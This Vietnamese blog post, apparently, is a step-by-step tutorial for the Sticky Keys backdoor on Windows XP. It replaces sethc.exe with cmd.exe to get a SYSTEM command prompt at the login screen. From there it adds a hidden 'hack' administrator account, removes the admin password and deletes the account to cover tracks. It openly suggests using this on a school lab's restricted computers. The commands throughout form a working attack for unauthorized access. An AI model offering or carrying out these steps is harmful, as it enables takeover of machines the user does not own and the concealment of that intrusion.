-Trước hết xem tư duy thế nào mà lại nghĩ ra cách này:
Trên Windows XP, nếu bạn nhấp phím Shift 5 lần, Windows sẽ gọi một chương trình nhỏ có tên là StickyKey. Đây là chương trình hỗ trợ người khuyết tật khi sử dụng Windows XP được đính kèm mặc đinh trong bộ tiện ích của Windows. Điều này có nghĩa là bạn có thể gọi chương trình này bằng phím tắt mà không cần đến giao diện thân thiện (1).
Nếu bạn đăng nhập bằng tài khoản có tên User1 và nhấp phím Shift 5 lần để gọi chương trình này, Windows sẽ lấy quyền của User1 để gọi chương trình StickyKey. Nếu bạn không đăng nhập vào bất kỳ một tài khoản nào mà gọi được StickyKey thì Widnows sẽ lấy quyên của hệ thống (System) để chạy StickyKey (2).
Từ giả định (1) và (2) trên, nếu bạn thay thế file thực thi của chương trình StickyKey (sethc.exe) bằng chương trình Command Run (cmd.exe) và gọi nó bằng 5 lần phím Shift mà không đăng nhập bằng tài khoản nào cả thì windows sẽ dùng quyền của Hệ thống (system) gọi file cmd.exe thay vì file sethc.exe. Thế là có thể làm bất cứ chuyện gì bằng tài khoản của cao nhất (quyền của Hệ thống) trên chương trình Command Run.
Cách thực hiện thủ thuật này:
+ Bước 1: Vào windows với tài khoản User bình thường và nhấn 5 lần phím Shift để gọi thử chương trình StickyKey trên Windows và đóng nó lại (chỉ nhằm để xem thử).
+ Bước 2: Khởi động lại máy vào 1 user không bị khóa pass (user này thường bị giới hạn vd: như không vào được My computer hay không copy được, điển hình là phòng thực hành tin trường ta có 2 user : Admin và Student, chúng ta chỉ vào được user student không vào được user Admin ) .
Nhưng mà máy của bạn chỉ có 1 user thì sao nhỉ. Lúc này thì khác trong lúc khởi động lại máy (lúc màn hình đen xì ý) thì bạn ấn F8 liên tục cho đến khi hiện 1 dãy chọn, thì bạn chọn khởi động với Command prompt. Đợi một lát sẽ vào cửa sổ cmd. OK!
(Phải đăng nhập được vào một tài khoản nào đó chỉ có quền hạn xem và đọc ví dụ như tài khoản Guest )
Tiếp theo bạn gõ vào: cd\ ( Lệnh dos học tin ở trường cũng nói mà )
gõ : cd windows >enter
gõ tiếp: cd system32 >enter
gõ: rename sethc.exe sethc.exe.bak
gõ: copy cmd.exe sethc.exe/y
Đoạn mã này làm các nhiệm vụ sau: 1. Sao lưu lại file sethc.exe bằng cách đặt lại tên là sethc.exe.bk
2. Thay thế file sethc.exe bằng file cmd.exe Đến đây, bạn nhấp phím Shift 5 lần, nếu chương trình Command Run được gọi thay vì chương trình StickyKey thì bạn đã thành công!
Chương trình StickyKey đã được thay bằng Command Run
+ Bước 3: Khởi động lại máy. Khi đến màn hình đăng nhập, bạn khoan hãy đăng nhập mà nhấn phím Shift 5 lần…… Lúc này chương trình Command Run xuất hiện, bạn nhập một trong những vào đoạn lệnh dưới đây:
+ Thêm một tài khoản hack với mật khẩu là 123
CODE: net user hack 123 /add > nhấn phím Enter khi hoàn thành!
hoặc nên không cần mật khẩu như sau:
CODE:net user hack /add
Nâng quyền tài khoản hack từ dạng user bình thường lên dạng Admin:
CODE: net localgroup Administrators hack /add > nhấn phím Enter khi hoàn thành!
+ Bước 4: Khởi động lại máy và vào winxp với user hack > Xong.
PS: Còn muốn vào user Admin thì vào control Panel > Account use > Remove pass của Admin.
Xóa dấu vết: Restart lại rồi lại Shift liên tục và gõ vào
net user hack / del (xóa acc hack đi)
để chắc chắn nên đổi lại tên cho cmd.exe và sethc.exe
Enjoy!!!
Không có nhận xét nào:
Đăng nhận xét